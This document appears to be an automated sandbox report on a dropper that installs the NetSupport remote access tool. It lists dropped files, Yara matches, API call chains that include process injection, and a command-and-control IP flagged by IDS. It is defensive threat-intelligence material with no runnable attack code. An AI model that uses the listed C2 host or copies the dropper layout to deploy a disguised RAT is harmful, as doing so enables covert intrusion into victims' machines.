Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_6D1CA980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange,	6_2_6D1CA980
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11070090 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,	9_2_11070090
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_110D8200 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,	9_2_110D8200

Yara detected NetSupport remote tool

Source: Yara match	File source: 9.2.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.shv.exe.74a90000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shv.exe.70030000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.shv.exe.70030000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.shv.exe.70030000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.shv.exe.70030000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shv.exe.74a90000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.shv.exe.74a90000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.shv.exe.70030000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.shv.exe.74a90000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.shv.exe.74a90000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.229e94ad820.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.shv.exe.6d1c0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2164286651.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2141232902.00000229E5442000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.2347023437.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2430920852.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.2159146896.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2431878910.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.2155681384.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2162511343.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2349971528.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3993652493.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.2256622126.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2142143293.00000229E5446000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2264608455.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2431151804.00000000010A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2142077833.00000229E5444000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2351314982.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.2429867736.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2263586732.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5988, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shv.exe PID: 5552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shv.exe PID: 6488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shv.exe PID: 1936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shv.exe PID: 4000, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shv.exe PID: 3360, type: MEMORYSTR
Source: Yara match	File source: C:\Users\Public\Netstat\pcicapi.dll, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Netstat\shv.exe, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Netstat\PCICHEK.DLL, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Netstat\HTCTL32.DLL, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Netstat\TCCTL32.DLL, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Netstat\PCICL32.DLL, type: DROPPED

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.61.128.74	unknown	United States		9009	M247GB	true
104.26.0.231	geo.netsupportsoftware.com	United States		13335	CLOUDFLARENETUS	false

Contacted Domains

Name	IP	Active
geo.netsupportsoftware.com	104.26.0.231	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://45.61.128.74/fakeurl.htm	true	Avira URL Cloud: safe	unknown
http://geo.netsupportsoftware.com/location/loca.asp	false		high

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Netstat\remcmdstub.exe	ReversingLabs: Detection: 13%
Source: C:\Users\Public\Netstat\shv.exe	ReversingLabs: Detection: 28%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 39%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.9% probability

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_110AD570 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,		6_2_110AD570
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_110AD570 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,		9_2_110AD570

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\Public\Netstat\msvcr100.dll

Jump to behavior

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: msvcr100.i386.pdb source: shv.exe, shv.exe, 00000006.00000002.3996339764.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, shv.exe, 00000009.00000002.2165257502.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, shv.exe, 0000000B.00000002.2264988650.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, shv.exe, 0000000D.00000002.2351625613.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, shv.exe, 0000000E.00000002.2432218131.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, msvcr100.dll.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: shv.exe, 00000006.00000002.3996589650.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 00000009.00000002.2166045519.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 0000000B.00000002.2265311157.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 0000000D.00000002.2352005765.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 0000000E.00000002.2432458267.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: shv.exe, 00000006.00000000.2155681384.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000006.00000002.3993652493.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000009.00000000.2159146896.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000009.00000002.2162511343.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000B.00000000.2256622126.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000B.00000002.2263586732.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000D.00000000.2347023437.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000D.00000002.2349971528.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000E.00000002.2430920852.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000E.00000000.2429867736.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: file.exe
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: shv.exe, 00000006.00000002.3996495464.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, shv.exe, 00000009.00000002.2165773946.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, shv.exe, 0000000B.00000002.2265179419.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, shv.exe, 0000000D.00000002.2351793987.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, shv.exe, 0000000E.00000002.2432366354.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, pcicapi.dll.0.dr

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7940BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF70E7940BC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7AB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF70E7AB190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7BFCA0 FindFirstFileExA,	0_2_00007FF70E7BFCA0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	6_2_1102D330
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	6_2_11065890
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	6_2_1106A0A0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	6_2_111266E0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	6_2_1110AFD0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	9_2_1102D330
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	9_2_11065890
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	9_2_1106A0A0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	9_2_111266E0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	9_2_1110AFD0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.6:49708 -> 45.61.128.74:443

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 104.26.0.231 104.26.0.231

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: M247GB M247GB

Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.128.74
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.128.74
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.128.74
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: geo.netsupportsoftware.com

Source: unknown

Source: file.exe, 00000000.00000003.2145215251.00000229E541E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2146640720.00000229E541E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2141232902.00000229E5442000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2144886227.00000229E541E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142143293.00000229E5446000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142077833.00000229E5444000.00000004.00000020.00020000.00000000.sdmp, shv.exe, shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr	String found in binary or memory: http://%s/fakeurl.htm
Source: file.exe, 00000000.00000003.2141232902.00000229E5442000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142143293.00000229E5446000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142077833.00000229E5444000.00000004.00000020.00020000.00000000.sdmp, shv.exe, shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr	String found in binary or memory: http://%s/testpage.htm
Source: file.exe, 00000000.00000003.2141232902.00000229E5442000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142143293.00000229E5446000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142077833.00000229E5444000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr	String found in binary or memory: http://%s/testpage.htmwininet.dll
Source: shv.exe, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://127.0.0.1
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://127.0.0.1RESUMEPRINTING
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0$
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: shv.exe, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
Source: shv.exe, 00000006.00000002.3994135214.00000000012D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp0
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
Source: shv.exe, 00000006.00000002.3994135214.00000000012D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspU
Source: shv.exe, 00000006.00000002.3994135214.00000000012D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspc
Source: shv.exe, 00000006.00000002.3994135214.00000000012D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspi
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://ocsp.globalsign.com/rootr30;
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://s2.symcb.com0
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
